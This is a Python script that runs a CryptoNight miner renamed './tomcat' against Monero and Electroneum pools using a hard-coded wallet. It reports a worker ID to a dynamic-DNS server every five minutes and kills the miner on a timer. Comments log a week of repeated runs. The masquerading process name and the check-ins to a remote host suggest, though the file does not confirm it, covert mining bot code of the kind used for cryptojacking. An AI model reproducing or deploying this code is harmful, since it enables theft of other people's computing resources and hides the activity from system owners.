import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:04:05.783489
#2018-02-17 16:50:03.852472
#2018-02-17 18:38:01.677201
#2018-02-17 20:25:02.918365
#2018-02-17 22:12:07.712943
#2018-02-17 23:56:05.799750
#2018-02-18 01:47:06.439734
#2018-02-18 03:36:04.757523
#2018-02-18 05:23:07.206730
#2018-02-18 07:14:06.250514
#2018-02-18 09:02:06.727489
#2018-02-18 10:49:06.699413
#2018-02-18 12:34:06.735117
#2018-02-18 14:21:06.965106
#2018-02-18 16:11:06.949966
#2018-02-18 18:01:05.096583
#2018-02-18 19:48:06.402181
#2018-02-18 21:34:06.046757
#2018-02-18 23:23:06.747970
#2018-02-19 01:11:01.733288
#2018-02-19 02:57:03.920048
#2018-02-19 04:44:06.310692
#2018-02-19 06:28:05.452917
#2018-02-19 08:18:01.386763
#2018-02-19 10:07:06.811287
#2018-02-19 11:56:04.369024
#2018-02-19 13:43:01.355359
#2018-02-19 15:31:07.832169
#2018-02-19 17:18:06.132493
#2018-02-19 19:07:08.161965
#2018-02-19 20:54:05.767526
#2018-02-19 22:43:04.853706
#2018-02-20 00:26:05.881221
#2018-02-20 02:14:04.917776
#2018-02-20 04:05:07.561123
#2018-02-20 05:48:05.273100
#2018-02-20 07:34:08.375262
#2018-02-20 09:19:07.962617
#2018-02-20 11:03:09.075152
#2018-02-20 12:49:04.578431
#2018-02-20 14:33:08.166163
#2018-02-20 16:17:04.934930
#2018-02-20 18:05:10.843442
#2018-02-20 19:55:01.908430
#2018-02-20 21:42:08.577742
#2018-02-20 23:22:04.649154
#2018-02-21 01:08:05.273693
#2018-02-21 03:58:06.348173
#2018-02-21 05:47:03.641645
#2018-02-21 07:35:07.593116
#2018-02-21 09:20:09.988855
#2018-02-21 11:10:01.643130
#2018-02-21 12:57:09.579667
#2018-02-21 14:44:05.969416
#2018-02-21 16:33:13.585825
#2018-02-21 18:23:01.963880
#2018-02-21 20:09:05.337760
#2018-02-21 21:56:01.480912
#2018-02-21 23:41:05.525160
#2018-02-22 01:29:06.320798
#2018-02-22 03:17:05.312560
#2018-02-22 05:04:04.651534
#2018-02-22 06:47:01.592752
#2018-02-22 08:35:07.052202
#2018-02-22 10:22:07.767437
#2018-02-22 12:09:01.700926
#2018-02-22 13:54:07.991091
#2018-02-22 15:42:06.964305
#2018-02-22 17:27:05.449875
#2018-02-22 19:16:07.189883
#2018-02-22 21:07:04.683678
#2018-02-22 22:51:04.202475
#2018-02-23 00:38:07.414623
#2018-02-23 02:24:03.966965
#2018-02-23 04:12:06.441093
#2018-02-23 05:58:03.533146
#2018-02-23 07:47:06.905370
#2018-02-23 09:51:07.269097
#2018-02-23 11:57:05.651123
#2018-02-23 13:45:10.399076
#2018-02-23 15:34:07.199313
#2018-02-23 17:22:06.654264
#2018-02-23 19:08:08.086051
#2018-02-23 20:53:07.591806
#2018-02-23 22:41:01.192949
#2018-02-24 00:27:05.551143
#2018-02-24 02:18:06.779077
#2018-02-24 04:07:06.428158
#2018-02-24 05:54:04.441182
#2018-02-24 07:42:06.124822
#2018-02-24 09:27:06.628165
#2018-02-24 11:21:01.479674
#2018-02-24 13:10:07.986876
#2018-02-24 15:00:01.431918
#2018-02-24 16:49:05.987925
#2018-02-24 18:37:06.005787
#2018-02-24 20:27:04.936530
#2018-02-24 22:23:01.498729
#2018-02-25 01:30:05.029264
#2018-02-25 05:20:07.062190
#2018-02-25 11:34:03.968953